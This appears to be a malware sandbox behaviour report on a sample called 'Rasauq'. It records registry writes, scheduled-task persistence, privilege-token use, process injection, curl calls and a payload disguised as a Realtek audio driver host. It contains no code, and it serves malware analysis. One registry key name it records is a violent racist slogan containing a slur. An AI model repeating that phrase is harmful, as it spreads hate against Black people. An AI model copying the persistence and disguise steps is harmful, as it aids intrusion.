Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-814918696-1585701690-3140955116-1000\{0C08449F-748C-43B8-9D42-0B68F9D4E018} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eikKwN2EBJ1Cyr7HTF0\HKEY_LOCAL_MACHINE\SOFTWARE\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik C:\Windows\system32\reg.exe N/A
Key created \Registry\User\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\behead all niggers\ C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Software\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Microsoft\Speech_OneCore\Isolated\ohDO1Sgy3MzgdEgEb4WYfDS4eik C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE C:\Windows\system32\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-814918696-1585701690-3140955116-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\SOFTWARE\Software\Rasauq on top\ C:\Windows\system32\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 620 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
PID 620 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
PID 620 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
PID 620 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
PID 620 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Windows\system32\cmd.exe
PID 620 wrote to memory of 4924 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq Launcher.exe C:\Windows\system32\cmd.exe
PID 4924 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4924 wrote to memory of 1792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2716 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2716 wrote to memory of 4408 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2716 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2716 wrote to memory of 4688 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2716 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2716 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2716 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2716 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2700 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\System32\attrib.exe
PID 2700 wrote to memory of 3024 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\System32\attrib.exe
PID 2700 wrote to memory of 5424 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\System32\attrib.exe
PID 2700 wrote to memory of 5424 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\System32\attrib.exe
PID 2716 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\schtasks.exe
PID 2716 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe C:\Windows\System32\schtasks.exe
PID 4924 wrote to memory of 2892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 4924 wrote to memory of 2892 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\curl.exe
PID 2700 wrote to memory of 5808 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\system32\cmd.exe
PID 2700 wrote to memory of 5808 N/A C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe C:\Windows\system32\cmd.exe
PID 5808 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 5808 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 5808 wrote to memory of 5500 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
PID 5808 wrote to memory of 5500 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Realtek Audio Driver Host\$77RealtekAudioDriverHost.exe
